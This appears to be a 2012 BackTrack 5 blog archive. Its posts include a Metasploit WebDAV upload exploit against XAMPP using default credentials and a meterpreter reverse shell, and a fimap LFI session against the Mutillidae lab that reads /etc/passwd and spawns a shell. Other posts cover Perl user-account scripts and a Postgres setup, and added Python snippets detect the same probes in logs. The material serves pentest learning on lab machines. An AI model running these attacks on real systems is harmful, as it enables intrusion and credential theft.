Archive

Archive for the ‘Back Track 5’ Category

Exploit XAMPP With Metasploit Framework

June 29, 2012 1 comment

XAMPP For Windows

XAMPP is an easy to install Apache distribution containing MySQL, PHP and Perl. XAMPP is really very easy to install and to use: just download, extract and start.

The distribution for Windows 2000, 2003, XP, Vista, and 7 contains: Apache, MySQL, PHP + PEAR, Perl, mod_php, mod_perl, mod_ssl, OpenSSL, phpMyAdmin, Webalizer, Mercury Mail Transport System for Win32 and NetWare Systems v3.32, Ming, FileZilla FTP Server, mcrypt, eAccelerator, SQLite, and WEB-DAV + mod_auth_mysql.

XAMPP For Windows (screenshot)

Nmap Scan:

root@bt:~# nmap -sS -T4 -A 192.168.235.1

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-06-28 11:52 EDT
Nmap scan report for 192.168.235.1
Host is up (0.00049s latency).
Not shown: 990 filtered ports
PORT     STATE SERVICE     VERSION
80/tcp   open  http        Apache httpd 2.2.14 ((Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1)
|_http-methods: No Allow or Public header in OPTIONS response (status code 302)
| http-title:             XAMPP            1.7.3
|_Requested resource was http://192.168.235.1/xampp/
135/tcp  open  msrpc       Microsoft Windows RPC
139/tcp  open  netbios-ssn
443/tcp  open  ssl/http    Apache httpd 2.2.14 ((Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1)
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10 23:48:47
|_Not valid after:  2019-11-08 23:48:47
|_http-methods: No Allow or Public header in OPTIONS response (status code 302)
|_sslv2: server still supports SSLv2
| http-title:             XAMPP            1.7.3
|_Requested resource was https://192.168.235.1:443/xampp/

We can use the XAMPP WebDAV PHP Upload exploit.

This module exploits weak WebDAV passwords on XAMPP servers. It uses supplied credentials to upload a PHP payload and execute it.

Open msfconsole and type:

msf > use exploit/windows/http/xampp_webdav_upload_php
msf exploit(xampp_webdav_upload_php) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf exploit(xampp_webdav_upload_php) > show options

Module options (exploit/windows/http/xampp_webdav_upload_php):

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
FILENAME                   no        The filename to give the payload. (Leave Blank for Random)
PATH      /webdav/         yes       The path to attempt to upload
Proxies                    no        Use a proxy chain
RHOST     192.168.235.1    yes       The target address
RPASS     xampp            yes       The Password to use for Authentication
RPORT     80               yes       The target port
RUSER     wampp            yes       The Username to use for Authentication
VHOST                      no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST  192.168.244.128  yes       The listen address
LPORT  4444             yes       The listen port

And exploit:

XAMPP exploit (screenshot)

We’re home.


How To Completely Remove User Account In Unix (Linux)

June 28, 2012 Add a comment

How do I remove a user’s access from my server? How do I delete a user account under Linux operating systems?

Use the userdel command to delete a user account and its related files, or use this Perl script:

#!/usr/bin/perl
use strict;
use warnings;
use Fcntl ':flock'; # import LOCK_* constants

if ($#ARGV != 0) {
    print STDERR "Usage is $0 <user>\n";
    exit(8);
}

my $user = $ARGV[0];

# Rewrite $file without the lines that belong to $user.  The old copy is
# kept as $file.bak; the new copy is written to $file.new and renamed
# into place.
sub edit_file($)
{
    my $file = shift;

    open IN_FILE, "<$file" or
        die("Could not open $file for input");

    open OUT_FILE, ">$file.new" or
        die("Could not open $file.new for output");

    while (1) {
        my $line = <IN_FILE>;
        if (not defined($line)) {
            last;
        }
        # Match the whole first field, not just a prefix: /^$user/ would
        # also drop "bobby" when deleting "bob".
        if ($line =~ /^\Q$user\E:/) {
            next;
        }
        print OUT_FILE $line;
    }
    close(IN_FILE);
    close(OUT_FILE);

    # Keep the original permissions (otherwise /etc/shadow would get the
    # umask default and become world-readable after the rename).
    my $mode = (stat($file))[2] & 07777;
    chmod($mode, "$file.new");

    unlink("$file.bak");
    rename("$file", "$file.bak");
    rename("$file.new", $file);
}

# getpwnam returns an empty list (not -1) when the user does not exist
my @info = getpwnam($user);
if (!@info) {
    die("No such user $user");
}

open PW_FILE, "</etc/passwd" or
    die("Could not read /etc/passwd");

# Lock the file for the duration of the program
flock PW_FILE, LOCK_EX;

edit_file("/etc/group");
edit_file("/etc/shadow");

if ($info[7] eq "/home/$user") {
    system("rm -rf /home/$user");
} else {
    print "User has a non-standard home directory.\n";
    print "Please remove manually.\n";
    print "Directory = $info[7]\n";
}
print "User $user -- Deleted\n";

edit_file("/etc/passwd");

flock(PW_FILE, LOCK_UN);
close(PW_FILE);

This script must be run as root.

Running the script


root@bt:~/src/perl# ./del_user_a.pl
Usage is ./del_user_a.pl <user>
root@bt:~/src/perl# ./del_user_a.pl wysocand

Running on BackTrack 5 R2 (screenshot)

Categories: Back Track 5, Perl

How To Automatically Create User Accounts in Unix ( Linux )

June 27, 2012 1 comment

The simplest way to add a new user to your system automatically is to run a Perl script like this:


#!/usr/bin/perl
use strict;
use warnings;
use Fcntl ':flock'; # import LOCK_* constants

# The files we are going to change (tested on BackTrack 5 R2)
my $pw_file = "/etc/passwd";
my $group_file = "/etc/group";
my $shadow_file = "/etc/shadow";

# Login name
my $login;
print "Login: ";
$login = <STDIN>;
chomp($login);

# Anchored check: the name must be one safe token, or it would corrupt
# the colon-separated account files
if ($login !~ /^[A-Za-z_][A-Za-z0-9_-]*$/) {
    die("No valid login specified");
}

open PW_FILE, "<$pw_file" or die("Could not read $pw_file");
# Lock the file for the duration of the program
flock PW_FILE, LOCK_EX;

# Check login info.
my $check_uid = getpwnam($login);
if (defined($check_uid)) {
    print "$login already exists\n";
    exit(8);
}

# Find the highest UID.  We'll be that +1
my @pw_info = <PW_FILE>;

my $uid = 0;    # UID for the user

# Find biggest user (accounts above 60000, such as nobody, are skipped)
foreach my $cur_pw (@pw_info) {
    my @fields = split /:/, $cur_pw;
    if ($fields[2] > 60000) {
        next;
    }
    if ($fields[2] > $uid) {
        $uid = $fields[2];
    }
}
$uid++;

# Each user gets his own group.
my $gid = $uid;

# Default home dir.
my $home_dir = "/home/$login";

print "Full Name: "; # Get user full name
my $full_name = <STDIN>;
chomp($full_name);
$full_name =~ s/:/ /g;    # a colon would add a field to the passwd line

my $shell = "";    # Get user shell to use
while (! -f $shell) {
    print "Shell: ";
    $shell = <STDIN>;
    chomp($shell);
}

print "Setting up account for: $login [$full_name]\n";

# Append through a separate handle: reopening PW_FILE would close the
# locked handle and drop the lock
open PW_OUT, ">>$pw_file" or
    die("Could not append to $pw_file");
print PW_OUT
    "${login}:x:${uid}:${gid}:${full_name}:${home_dir}:$shell\n";
close PW_OUT;

open GROUP_FILE, ">>$group_file" or
    die("Could not append to $group_file");
print GROUP_FILE "${login}:x:${gid}:$login\n";
close GROUP_FILE;

# '*' keeps the account locked until passwd sets a real hash below;
# 11647 is the last-change day count used by the original script
open SHADOW, ">>$shadow_file" or
    die("Could not append to $shadow_file");
print SHADOW "${login}:*:11647:0:99999:7:::\n";
close SHADOW;

# Create the home directory
mkdir($home_dir);
chmod(0755, $home_dir);
system("cp -R /etc/skel/.[a-zA-Z]* $home_dir");
system("find $home_dir -print ".
    "-exec chown ${login}:${login} {} \\;");

# Set the password for the user
print "Setting password\n";
system("passwd $login");

flock(PW_FILE, LOCK_UN);
close(PW_FILE);

How It Works:

  • Lock the /etc/passwd file
  • Get the user name
  • Lock the password file
  • Make sure the user doesn’t exist
  • Generate a user ID for the new user
  • Create an entry in /etc/passwd
  • Create an entry in /etc/shadow
  • Create an entry in /etc/group
  • Create the user home directory
  • Set the initial password for new user
  • Unlock the /etc/passwd file
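Both the delete-user script earlier and the add-user script above edit the colon-separated account files by hand. The following Python is an added example, not part of either script: it expresses the same steps as pure functions over file text so they can be checked offline, covering an anchored login check, the next-UID rule, the three entries that get appended, and an exact first-field match for deletion (the scripts’ /^$user/ prefix match would also remove "bobby" when deleting "bob"). The /etc/passwd sample is constructed.

```python
import re
from datetime import date

# Constructed /etc/passwd sample for offline testing; not from a real host.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
bob:x:1000:1000:Bob:/home/bob:/bin/bash
bobby:x:1001:1001:Bobby:/home/bobby:/bin/bash
"""

# Anchored, lowercase POSIX-style login name; the scripts' unanchored
# /[A-Z_a-z0-9]+/ would accept "bob:x:0:0" and corrupt the passwd line.
LOGIN_RE = re.compile(r"^[a-z_][a-z0-9_-]{0,31}$")


def valid_login(login):
    return bool(LOGIN_RE.match(login))


def next_uid(passwd_text, ceiling=60000):
    """Highest UID not above the ceiling, plus one (the add-user script's
    rule, which skips system accounts such as nobody at 65534)."""
    uid = 0
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) < 3 or not fields[2].isdigit():
            continue  # skip comments and malformed lines instead of crashing
        cur = int(fields[2])
        if cur <= ceiling:
            uid = max(uid, cur)
    return uid + 1


def days_since_epoch(today=None):
    """Value for the shadow 'last change' field (the script hard-codes 11647)."""
    today = today or date.today()
    return (today - date(1970, 1, 1)).days


def account_entries(login, uid, full_name, home, shell, last_change_days):
    """The passwd, group and shadow lines the add-user script appends.
    '*' in the shadow hash field keeps the account locked until passwd runs."""
    if not valid_login(login):
        raise ValueError("invalid login name: %r" % login)
    if ":" in full_name:
        raise ValueError("full name must not contain ':'")
    return (
        "%s:x:%d:%d:%s:%s:%s" % (login, uid, uid, full_name, home, shell),
        "%s:x:%d:%s" % (login, uid, login),
        "%s:*:%d:0:99999:7:::" % (login, last_change_days),
    )


def remove_user_lines(text, login):
    """Drop only the lines whose first field is exactly `login`.
    The delete script's /^$user/ prefix match would also drop 'bobby'
    when removing 'bob'."""
    kept = [l for l in text.splitlines() if l.split(":", 1)[0] != login]
    return "\n".join(kept) + ("\n" if text.endswith("\n") else "")
```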

Example on BackTrack Linux:

Add New User (screenshots)

Source:

1. Perl for System Administration. http://docstore.mik.ua/orelly/perl/sysadmin/index.htm

Categories: Back Track 5, Perl

Perl – OnLine Library

June 27, 2012 Add a comment
  1. HTMLified Perl 5 Reference Guide – http://www.oopweb.com/Perl/Documents/Perl5Ref/VolumeFrames.html
  2. Perl 5 Documentation – http://www.oopweb.com/Perl/Documents/PerlDoc/VolumeFrames.html
  3. Perl for Perl Newbies – http://www.oopweb.com/Perl/Documents/P4PNewbies/VolumeFrames.html
  4. Perl for Win32 FAQ – http://www.oopweb.com/Perl/Documents/PerlWin32/VolumeFrames.html
  5. Beginning Perl – http://www.perl.org/books/beginning-perl/
  6. Impatient Perl – http://www.perl.org/books/impatient-perl/
  7. Extreme Perl – http://www.extremeperl.org/bk/home
  8. MacPerl: Power & Ease – http://macperl.com/ptf_book/r/MP/i2.html
  9. Embedding Perl in HTML with Mason – http://www.masonbook.com
  10. Perl for the Web – http://www.globalspin.com/thebook/
  11. Web Client Programming with Perl – http://www.oreilly.com/openbook/webclient/
  12. Perl 5 By Example – http://www.computer-books.us/perl_0010.php
  13. An Introduction to Perl – http://www.linuxtopia.org/Perl_Tutorial/index.html
  14. Beginning CGI Programming with Perl – http://www.learnthat.com/internet/learn-160-cgi_programming_perl.htm
  15. Perl Tutorial: Start – http://www.comp.leeds.ac.uk/Perl/start.html
  16. A Perl Tutorial – http://www.civeng.carleton.ca/Courses/Grad/1995-96/82.562/perl/
  17. Robert’s Perl Tutorial – http://www.sthomas.net/oldpages/roberts-perl-tutorial.htm
  18. Beginning Perl Tutorials – http://www.pageresource.com/cgirec/index2.htm
  19. Beginner’s Guide to CGI Scripting with Perl – http://www.lies.com/begperl/
  20. Practical Perl Programming – http://www.cs.cf.ac.uk/Dave/PERL/
  21. Perl 5 Unleashed – http://octopus.cdut.edu.cn/~yf17/perl5/
  22. Perl for System Administration – http://www.unix.org.ua/orelly/perl/sysadmin/index.htm
  23. PERL — Practical Extraction and Report Language – http://www-cgi.cs.cmu.edu/cgi-bin/perl-man
  24. Programming Perl – http://www.unix.org.ua/orelly/perl/prog3/
  25. Steve Litt’s Perls of Wisdom – http://www.troubleshooters.com/codecorn/littperl/index.htm
  26. Perl Regular Expression Tutorial – http://virtual.park.uga.edu/humcomp/perl/regex2a.html
  27. Perl Documentation – http://www.perl.com/pub/q/documentation
  28. Programming Perl 5 – http://www.squirrel.nl/pub/perlref-5.004.1.pdf
  29. Beginner’s Introduction to Perl – http://www.perl.com/pub/a/2000/10/begperl1.html
  30. Perl in a Nutshell – http://www.unix.org.ua/orelly/perl/perlnut/index.htm
  31. Programming Perl, 3rd Edition – http://www.unix.org.ua/orelly/perl/prog3/index.htm
  32. Advanced Perl Programming – http://www.unix.org.ua/orelly/perl/advprog/index.htm
  33. Perl Cookbook – http://www.unix.org.ua/orelly/perl/cookbook/index.htm
  34. XML processing with Perl – http://www.xmltwig.com/tutorial/perl_xml/mtb04_01.html
Categories: Back Track 5, Perl

FIMAP – LFI/RFI Auditing Tool.

June 26, 2012 Add a comment

FIMAP:

Fimap is a little python tool which can find, prepare, audit, exploit and even google automatically for local and remote file inclusion bugs in webapps. fimap should be something like sqlmap just for LFI/RFI bugs instead of sql injection. It’s currently under heavy development but it’s usable.

The goal of fimap is to improve the quality and security of your website.

Do not use this tool on servers where you don’t have permission to pentest!

Fimap is a Local and Remote file inclusion auditing Tool (LFI/RFI).

How to use:

fimap.py [Options]

[Options]

  •  -h – Help
  •  -u [URL] – URL to scan
  •  -m – Mass scan
  •  -l [filename] – List of URLs for mass scan
  •  -g – Perform Google search to find URLs
  •  -q – Google search query
  •  -H – Harvests a URL recursively for additional URLs to scan
  •  -w [filename] – Write URL list for mass scan
  •  -b – Enables blind testing where errors are not reported by the web application
  •  -x – Exploit vulnerabilities

Output:
Scans target URL(s) for RFI/LFI bugs and, optionally, allows you to exploit any discovered vulnerabilities.

Mutillidae Web App - Metasploitable 2 LFI/RFI Auditing

Mutillidae is a free, open source web application provided to allow security enthusiasts to pen-test a web application. NOWASP (Mutillidae) can be installed on Linux, Windows XP, and Windows 7 using XAMPP, making it easy for users who do not want to administer a web server. It is already installed on Samurai WTF and Rapid7 Metasploitable-2. The existing version can be updated on either. NOWASP (Mutillidae) contains dozens of vulns and hints to help the user, providing an easy-to-use web hacking environment deliberately designed to be used as a lab for security enthusiasts, classrooms, labs, and vulnerability assessment tool targets. Mutillidae has been used in graduate security courses, in corporate web sec training courses, and as an "assess the assessor" target for vulnerability assessment software.


c:\Python25\fimap_alpha_v09>python fimap.py -u "http://192.168.235.129/mutillidae/index.php?page=user-info.php"
fimap v.09 (For the Swarm)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)

SingleScan is testing URL: 'http://192.168.235.129/mutillidae/index.php?page=user-info.php'
[16:05:56] [OUT] Inspecting URL 'http://192.168.235.129/mutillidae/index.php?page=user-info.php'...
[16:05:56] [INFO] Fiddling around with URL...
[16:05:56] [OUT] [PHP] Possible file inclusion found! -> 'http://192.168.235.129/mutillidae/index.php?page=FmQXBJP2' with Parameter 'page'.
[16:05:56] [OUT] [PHP] Identifying Vulnerability 'http://192.168.235.129/mutillidae/index.php?page=user-info.php' with Parameter 'page'...
[16:05:56] [INFO] Scriptpath received: '/var/www/mutillidae'
[16:05:56] [INFO] Operating System is 'Unix-Like'.
[16:05:56] [INFO] Testing file '/etc/passwd'...
[16:05:57] [INFO] Testing file '/proc/self/environ'...
[16:05:57] [INFO] Testing file 'php://input'...
[16:05:57] [INFO] Testing file '/var/log/apache2/access.log'...
[16:05:57] [INFO] Testing file '/var/log/apache/access.log'...
[16:05:57] [INFO] Testing file '/var/log/httpd/access.log'...
[16:05:58] [INFO] Testing file '/var/log/apache2/access_log'...
[16:05:58] [INFO] Testing file '/var/log/apache/access_log'...
[16:05:58] [INFO] Testing file '/var/log/httpd/access_log'...
[16:05:58] [INFO] Testing file 'http://www.phpbb.de/index.php'...
###########################################################
#[1] Possible PHP-File Inclusion
#
###########################################################
#::REQUEST
#  [URL]        http://192.168.235.129/mutillidae/index.php?page=user-info.php
#  [HEAD SENT]
#::VULN INFO
#  [GET PARAM]  page
#  [PATH]       /var/www/mutillidae
#  [OS]         Unix
#  [TYPE]       Absolute Clean
#  [TRUNCATION] No Need. It’s clean.
#  [READABLE FILES]
#                   [0] /etc/passwd
#                   [1] /proc/self/environ
########################################################################

This information can be used to further exploit the vulnerable system either manually or with another tool. On the other hand, we can also use fimap’s internal attack features by adding the "-x" parameter to the command line.

c:\Python25\fimap_alpha_v09>python fimap.py -x
fimap v.09 (For the Swarm)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)

###################################################
#:: List of Domains ::                            #
###################################################
#[1] 192.168.235.129                              #
#[ ] And 0 hosts with no valid attack vectors.    #
#[q] Quit                                         #
#######################################################
Choose Domain: 1
#######################################################
#:: FI Bugs on '192.168.235.129' ::
#
######################################################
#[1] URL: '/mutillidae/index.php?page=user-info.php' injecting file: '/proc/self/environ' using GET-param: 'page'    #
#[q] Quit

#####################################################
Choose vulnerable script: 1
[16:17:49] [INFO] Testing PHP-code injection thru User-Agent…
[16:17:49] [OUT] PHP Injection works! Testing if execution works…
[16:17:49] [INFO] Testing execution thru 'popen[b64]'...
[16:17:49] [OUT] Execution thru 'popen[b64]' works!
####################################################
#:: Available Attacks – PHP and SHELL access ::    #
####################################################
#[1] Spawn fimap shell                             #
#[2] Spawn pentestmonkey's reverse shell           #
#[q] Quit                                          #
####################################################
Choose Attack: 1
Please wait – Setting up shell (one request)…
——————————————-
Welcome to fimap shell!
Better don’t start interactive commands! 😉
Also remember that this is not a persistent shell.
Every command opens a new shell and quits it after that!
Enter 'q' to exit the shell.
——————————————-
fishell@www-data:/var/www/mutillidae$> who

We can see:

Fimap at work
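Seen from the server side, each probe fimap sent above leaves a distinct trace in the Apache access log. The following Python is an added example, not part of fimap or Mutillidae: it classifies the page= value of every request (absolute path, stream wrapper, remote URL, traversal) and flags a User-Agent carrying PHP code, which is the log-poisoning step the session above relies on. The log lines are constructed to mirror those probes.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed Apache combined-log lines; the requests mirror fimap's probes.
SAMPLE_LOG = """\
192.168.235.1 - - [28/Jun/2012:16:05:55 -0400] "GET /mutillidae/index.php?page=user-info.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.235.1 - - [28/Jun/2012:16:05:56 -0400] "GET /mutillidae/index.php?page=/etc/passwd HTTP/1.1" 200 1800 "-" "Mozilla/5.0"
192.168.235.1 - - [28/Jun/2012:16:05:57 -0400] "GET /mutillidae/index.php?page=php://input HTTP/1.1" 200 900 "-" "Mozilla/5.0"
192.168.235.1 - - [28/Jun/2012:16:05:58 -0400] "GET /mutillidae/index.php?page=http://www.phpbb.de/index.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"
192.168.235.1 - - [28/Jun/2012:16:17:49 -0400] "GET /mutillidae/index.php?page=/proc/self/environ HTTP/1.1" 200 2100 "-" "<?php echo 1; ?>"
10.0.0.7 - - [28/Jun/2012:16:20:00 -0400] "GET /mutillidae/index.php?page=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 404 300 "-" "curl/7.21"
"""

# client, request target and User-Agent of one combined-format line
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" \d+ \S+ "[^"]*" "([^"]*)"')


def classify_include_param(value):
    """Label one page= value the way an LFI/RFI auditor would see it."""
    v = unquote(value)
    if "\x00" in v:
        return "null-byte"          # classic suffix-truncation attempt
    if re.match(r"^[a-z]+://", v, re.I):
        if v.lower().startswith(("http://", "https://", "ftp://")):
            return "remote"         # RFI: include from another host
        return "wrapper"            # php://input, data:, etc.
    if v.startswith("/"):
        return "absolute"           # /etc/passwd, /proc/self/environ, logs
    if ".." in v.split("/"):
        return "traversal"
    if re.fullmatch(r"[A-Za-z0-9_-]+\.php", v):
        return "ok"                 # a plain page name
    return "suspicious"             # e.g. fimap's random FmQXBJP2 probe


def scan_access_log(text, param="page"):
    """Return (client, value, reason) for each request whose include parameter
    is not a plain page name, plus 'ua-php' for a User-Agent carrying PHP."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, target, ua = m.groups()
        for value in parse_qs(urlsplit(target).query).get(param, []):
            reason = classify_include_param(value)
            if reason != "ok":
                findings.append((client, value, reason))
        if "<?php" in ua:
            findings.append((client, ua, "ua-php"))
    return findings
```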

Installing Metasploit Framework + PostgreSQL Under VMware BackTrack 5

June 1, 2012 Add a comment

I’ve just installed the new and improved BackTrack 5 in VMware. As always, I made an apt-get update && apt-get dist-upgrade -y and after that a msfupdate. I launched Metasploit framework, and was about to start postgresql when I realized that BT 5 is with MySQL.

I created a workaround script, it’s not pretty but it works. You will need the following packages installed before running the script:

apt-get install postgresql-client libpq-dev

Copy the script into a file, e.g. script.sh, then:

chmod +x script.sh; ./script.sh

The commands (script.sh) I used were:

#!/bin/sh

## Kill database process
echo "Killing database process .."
kill $(pgrep postgres) > /dev/null 2>&1

## replace the md5 auth with trust for local ipv4 connections
echo "Allowing all local IPV4 connections .."
cp /opt/framework3/postgresql/data/pg_hba.conf /opt/framework3/postgresql/data/pg_hba.conf.bak
cat /opt/framework3/postgresql/data/pg_hba.conf | sed -e 's/host all all 127.0.0.1\/32 md5/host all all 127.0.0.1\/32 trust/' > /opt/framework3/postgresql/data/tmp.conf
mv /opt/framework3/postgresql/data/tmp.conf /opt/framework3/postgresql/data/pg_hba.conf

## restart postgres server (only necessary during this process, on reboot it will start automatically)
echo "Restarting postgres server (only necessary during this process, on reboot it will start automatically) .."
su postgres -c "/opt/framework3/postgresql/bin/postgres -D /opt/framework3/postgresql/data -p 7175 &"
# wait for server to start
sleep 5

## Now we can access via psql we can change user for database
echo "Changing postgres user postgres's password to 'postgres_password' .."
su postgres -c "psql -h 127.0.0.1 -p 7175 -c \"ALTER USER postgres WITH PASSWORD 'postgres_password'\";" > /dev/null 2>&1

## Create a database for usage with msf
echo "Creating database 'msf_db' for use with metasploit .."
su postgres -c "psql -h 127.0.0.1 -p 7175 -c \"CREATE DATABASE msf_db\";" > /dev/null 2>&1

## change back to md5 auth
echo "Changing back to md5 auth .."
cat /opt/framework3/postgresql/data/pg_hba.conf | sed -e 's/host all all 127.0.0.1\/32 trust/host all all 127.0.0.1\/32 md5/' > /opt/framework3/postgresql/data/tmp.conf
mv /opt/framework3/postgresql/data/tmp.conf /opt/framework3/postgresql/data/pg_hba.conf

###############################

## msfconsole

## change ruby version
echo "##################################"
echo "Changing Ruby version - please choose the '0' option .."
echo "##################################"
update-alternatives --config ruby

## install postgres gem
gem install postgres

# go into msfconsole and choose the db_driver
echo "Updating msf .."
/opt/framework3/msf3/msfupdate

echo
echo "#################################################"
echo "starting msfconsole .."
echo "#################################################"

/opt/framework3/msf3/msfconsole

Result of the script:

root@bt:/opt/framework3# ./script.sh
Killing database process ..
Allowing all local IPV4 connections ..
Restarting postgres server (only necessary during this process, on reboot it will start automatically) ..
FATAL:  bogus data in lock file "postmaster.pid": ""
Changing postgres user postgres's password to 'postgres_password' ..
Creating database 'msf_db' for use with metasploit ..
Changing back to md5 auth ..
##################################
Changing Ruby version - please choose the '0' option ..
##################################
There are 2 choices for the alternative ruby (providing /usr/bin/ruby).

  Selection    Path                Priority   Status
————————————————————
  0            /usr/bin/ruby1.8     500       auto mode
  1            /usr/bin/ruby1.8     500       manual mode
* 2            /usr/bin/ruby1.9.2   400       manual mode

Press enter to keep the current choice[*], or type selection number: 0
update-alternatives: using /usr/bin/ruby1.8 to provide /usr/bin/ruby (ruby) in auto mode.
Building native extensions.  This could take a while…
—————————————————————————

This is an old, deprecated version of the Ruby PostgreSQL driver that hasn’t
been maintained or supported since early 2008.

You should install/require 'pg' instead.

If you need the 'postgres' gem for legacy code that can't be converted, you can
still install it using an explicit version, like so:

  gem install postgres -v '0.7.9.2008.01.28'
  gem uninstall postgres -v '>0.7.9.2008.01.28'

If you have any questions, the nice folks in the Google group can help:

  http://goo.gl/OjOPP / ruby-pg@googlegroups.com

—————————————————————————
Successfully installed pg-0.13.2
Successfully installed postgres-0.8.1
2 gems installed
Installing ri documentation for pg-0.13.2…

Enclosing class/module 'rb_mPG' for class Connection not known

Enclosing class/module 'rb_mPG' for class Result not known
Installing ri documentation for postgres-0.8.1...
Installing RDoc documentation for pg-0.13.2...

Enclosing class/module 'rb_mPG' for class Connection not known

Enclosing class/module 'rb_mPG' for class Result not known
Installing RDoc documentation for postgres-0.8.1…
Updating msf ..
[*]
[*] Attempting to update the Metasploit Framework…
[*]

A    external/source/armitage
A    external/source/armitage/lib
A    external/source/armitage/lib/postgresql-9.1-901.jdbc4.jar
A    external/source/armitage/lib/sleep.jar
A    external/source/armitage/lib/msgpack-0.5.1-devel.jar
A    external/source/armitage/lib/jgraphx.jar
A    external/source/armitage/scripts
A    external/source/armitage/scripts/tokens.sl
A    external/source/armitage/scripts/server.sl
A    external/source/armitage/scripts/shell.sl
A    external/source/armitage/scripts/modules.sl
A    external/source/armitage/scripts/targets.sl

………………………………………………………………..

##################################################
starting msfconsole ..
##################################################

Call trans opt: received. 2-19-98 13:24:18 REC:Loc

Trace program: running

wake up, Neo…
the matrix has you
follow the white rabbit.

knock, knock, Neo.


=[ metasploit v4.4.0-dev [core:4.4 api:1.0]
+ -- --=[ 843 exploits - 471 auxiliary - 142 post
+ -- --=[ 250 payloads - 27 encoders - 8 nops
=[ svn r15247 updated 5 days ago (2012.05.03)

msf > db_status
[*] postgresql selected, no connection
msf > db_connect postgres:postgres_password@127.0.0.1:7175/msf_db

msf > db_status
[*] postgresql connected to msf_db
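The script above opens a window in which the loopback rule in pg_hba.conf is switched from md5 to trust, creates the msf database, and switches it back, all with sed patterns that assume single spaces between fields. The following Python is an added example, not part of the page’s script: it performs the same edit with a whitespace-tolerant match, counts what actually changed, and checks that no trust rule survives once the window closes; it also covers the IPv6 loopback rule (::1/128), which the script leaves alone. The pg_hba.conf excerpt is constructed in the column layout PostgreSQL ships with.

```python
import re

# Constructed pg_hba.conf excerpt. Fields are separated by runs of spaces,
# so a single-space sed pattern such as "host all all 127.0.0.1\/32 md5"
# would not match these lines and the edit would silently do nothing.
SAMPLE_PG_HBA = """\
# TYPE  DATABASE        USER            ADDRESS                 METHOD
local   all             all                                     md5
host    all             all             127.0.0.1/32            md5
host    all             all             ::1/128                 md5
"""

# One loopback rule per line: prefix up to the METHOD column, METHOD, rest.
LOOPBACK_RULE = re.compile(
    r"^(host\s+all\s+all\s+(?:127\.0\.0\.1/32|::1/128)\s+)(\S+)(.*)$", re.M)


def set_loopback_auth(conf, method):
    """Rewrite the METHOD of every loopback rule; return (new_conf, changed).
    changed == 0 is the silent failure the sed-based script cannot detect."""
    return LOOPBACK_RULE.subn(lambda m: m.group(1) + method + m.group(3), conf)


def loopback_methods(conf):
    """METHOD column of each loopback rule, in file order."""
    return [m.group(2) for m in LOOPBACK_RULE.finditer(conf)]


def trust_window(conf, action):
    """Open a 'trust' window like the script, run action(trusted_conf), then
    hand back the config with md5 restored. Fails loudly if no rule matched
    or if a trust rule would survive the restore."""
    trusted, changed = set_loopback_auth(conf, "trust")
    if changed == 0:
        raise RuntimeError("no loopback rule matched; refusing to continue")
    try:
        result = action(trusted)
    finally:
        restored, _ = set_loopback_auth(trusted, "md5")
    if "trust" in loopback_methods(restored):
        raise RuntimeError("a loopback rule is still set to trust")
    return restored, result
```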

VMware – Back Track 5 Start Up

May 29, 2012 3 comments

Back Track 5 Start Up

  • Power on/start up BackTrack
  • Log in with the default user name and password (user root, password toor)

root@bt:~#

  • Start X (the windows GUI)

root@bt:~# startx

  • View all the network interfaces on your machine

root@bt:~# ifconfig -a

  • Turn up (on) the desired network interface

root@bt:~# ifconfig eth0 up

  • Assign an IP address manually

root@bt:~# ifconfig eth0 192.168.0.1 up

  • View the manually assigned IP address

root@bt:~# ifconfig

  • Assign an IP address through DHCP

root@bt:~# dhclient eth0

  • View the dynamically assigned address

root@bt:~# ifconfig

  • Reboot the machine using the command line interface

root@bt:~# reboot

  • Power off the machine using the command line interface

root@bt:~# poweroff

StartUp.sh


#!/bin/bash

echo "Setting up the victim machine, this will take just a moment..."

ifconfig eth0 down

# pick a random host address between .1 and .254 (the original was missing the +)
ifconfig eth0 172.16.45.$(( ($RANDOM % 254) + 1 )) up

# uncomment the following lines by removing the #, to start up services on your victim
# please note, you may need to change the location / path depending on your distro

/etc/init.d/ssh start
# note, you may have to generate your SSH key using sshd-generate

/etc/init.d/apache2 start

/etc/init.d/atftpd start

echo "This victim machine is now setup."
echo "The IP address is somewhere in the 172.16.45.0/24 network."
echo "You may now close this window and begin your attack...Good luck!"

Categories: Back Track 5